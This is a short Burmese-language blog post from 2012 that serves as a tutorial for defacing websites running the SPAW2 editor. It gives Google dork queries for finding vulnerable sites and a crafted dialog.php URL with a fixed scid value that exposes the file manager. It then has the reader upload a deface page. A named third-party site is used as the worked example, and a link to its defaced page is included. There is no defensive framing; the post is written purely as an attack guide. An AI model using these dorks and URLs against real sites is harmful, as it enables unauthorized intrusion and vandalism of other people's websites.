Pages
▼
Pages - Menu
▼
Thursday, April 5, 2012
SPAW Vulnerably [ Tutorials ]
ပထမဆံုး Google Dork ရွာမယ္.....။google.com မွာ ေအာက္ကကုတ္ေတြကို ရွာလိုက္ပါ.......။
inurl:spaw2/dialogs/
Or
inurl:spaw2/uploads/files/
ေပၚလာတဲ့ဆိုက္တစ္ခုကိုေရြးလိုက္ပါ....။
ေပၚလာတဲ့ ဆိုက္ URL ေနာက္ကေအာက္ပါ statement ေတြထည့္လိုက္ပါ......။
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9
ဥပမာ........http://olgabz.com ဆိုပါရင္ ေအာက္ပါအတိုင္းျဖစ္ပါသည္။
http://olgabz.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9
၀ဘ္ဆိုက္ေပါက္ေနရင္ အထက္ပါအတိုင္းဖိုင္ေတြ ေပၚေနလိမ့္မယ္...။ျပီးရင္ image ကို File အျဖစ္ေရြး လိုက္ပါ။ေအာက္ကပံု ကိုၾကည့္ပါ။
ျပီးရင္ Browse ကိုႏွိပ္ ျပီးရင္ ကိုယ့္ Deface page ကိုတင္လိုက္ပါ....။
ရတယ္ဆိုရင္ ကိုယ့္ ဖိုင္နာမည္ေပၚေနလိမ့္မယ္.....။ကၽြန္ေတာ္ မ်ည္းသားထားတယ္.....။
ကိုယ့္ deface page result ကိုရွာခ်င္တယ္ဆိုရင္ ေအာက္ပါအတိုင္းျပန္ရွာႏိုင္ပါတယ္......။
http://olgabz.com/spaw2/uploads/files/shwekoyantaw.html
shwekoyantaw.html ေနရာမွာ သင့္ဖိုင္နာမည္ကိုထည့္ပါ...။
Demo Link:http://olgabz.com/spaw2/uploads/files/shwekoyantaw.html
P.S:
mmhackerforums.noonhost.com မွတင္ထားေသာ ဗီဒီယို ဖိုင္အားကၽြန္ေတာ္ Tutorial အျဖစ္ ျပန္ျပင္ေရးသာပါသည္။
shwekoyantaw